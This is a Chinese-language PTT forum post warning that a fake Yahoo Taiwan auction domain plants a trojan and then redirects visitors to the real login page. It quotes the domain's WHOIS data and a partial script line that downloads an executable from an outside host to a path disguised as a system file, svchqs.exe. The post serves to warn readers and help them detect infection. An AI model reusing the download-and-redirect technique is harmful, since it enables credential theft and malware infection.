※ 引述《NanaseHitomi (七瀨瞳)》之銘言： : 是騙人的。 : 這個網址註冊的資料如下 : Domain : tw-bid-yahoo.com <--網址名 : Registered : Tue Feb 27 00:00:00 2007 <--註冊日期 : Expiration date: 27 Feb 2008 08:37:43 <--網址到期時間 : Registrant : : KONGFU <--註冊者名稱（公司或個人） : bruce lee (jswolf520@263.net)　<--註冊者電子郵件 : （這邊用的是263.net大陸免費帳號） : : 推 ac537:我點那個網址有看到我設的安全圖章耶~~~ 140.112.28.211 05/31 13:48 : → ac537:現在技術這麼利害了阿~~~? 140.112.28.211 05/31 13:49 : 推 Koyen:看來安全圖章又被破了... 125.225.136.146 05/31 14:01 並不是安全圖章被破的問題^^" 你看到安全圖章的時候，已經是轉到真正的yahoo拍賣網頁了。 這個網頁的用處是盜帳號密碼，至於要怎麼盜？ 就是當你點下網址的時候，就被植入了木馬。 因為在假網頁中有以下的程式碼， <script>var url2,path2;url2="http://www .bbsexgirl. com/qxq/1 .exe"; path2="C:\\windows\\system32\\svchqs.exe"; 那個1.exe就是個病毒程式 等到這個程式被植入後，之後又有行 <script language="javascript"> <!-- location.replace("https://login.yahoo.com/config/login?.intl=tw"); --> </script> 轉頁到真正的登入頁面。 這時使用者看到有安全圖章，不疑有它就輸入了帳號密碼，網釣客也就得手了orz 另，懷疑自己不小心中標的板友，請掃個毒，找看看自己的電腦裡面有沒有 svchqs.exe <--這個是木馬檔案，按照上面的網頁程式來看，中毒的話會被放在 C:\\windows\system32\下面 -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 203.67.14.139 ※ 編輯: NanaseHitomi 來自: 203.67.14.139 (05/31 15:15)